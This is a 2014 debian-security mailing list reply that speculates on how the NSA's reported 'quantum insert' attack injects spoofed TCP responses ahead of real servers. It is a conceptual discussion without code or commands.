On Tue, Jan 28, 2014 at 2:08 PM, Hans-Christoph Steiner <h...@at.or.at> wrote: > I think the MITM attacks that the NSA does on the core internet routers are > likely based on IP rather than DNS. The reports talk about the system is > setup to respond before any of the real servers can. So my guess is that they > are replying to ARPs, thereby claiming an IP. Just a guess...
If you're speaking about quantum insert, the NSA isn't stealing IPs,it doesn't need to as the network allow pretty much anyone to forge a packet with any non-RFC-1918 IP. What I understood was that the NSA is able to analyze requests coming from some users in realtime and reply with a spoof responses. You can do it in several ways like hijacking the tcp connection to control the stream from end-to-end but I guess this is too costly. You could get only the packet that contain the GET request (for HTTP request) and reply faster than the server with another response. You know all the parameter of the tcp/ip connection so it's easy to hijack a couple of unencrypted packets. The success rate a not 100% because you need to beat the real server and send your response faster. Do so will cause the real server to be confused by the ACK the client sends, I'm not sure how the TCP stack will react. It might react differently depending on the OS/kernel too. See: http://www.spiegel.de/international/world/the-nsa-uses-powerful-toolbox-in-effort-to-spy-on-global-networks-a-940969-3.html -- Jérémie MARGUERIE -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/CAKS89GrGYLnLdsoshPE9McXgdVA-tyQRuOrgpDxYY3�-m...@mail.gmail.com
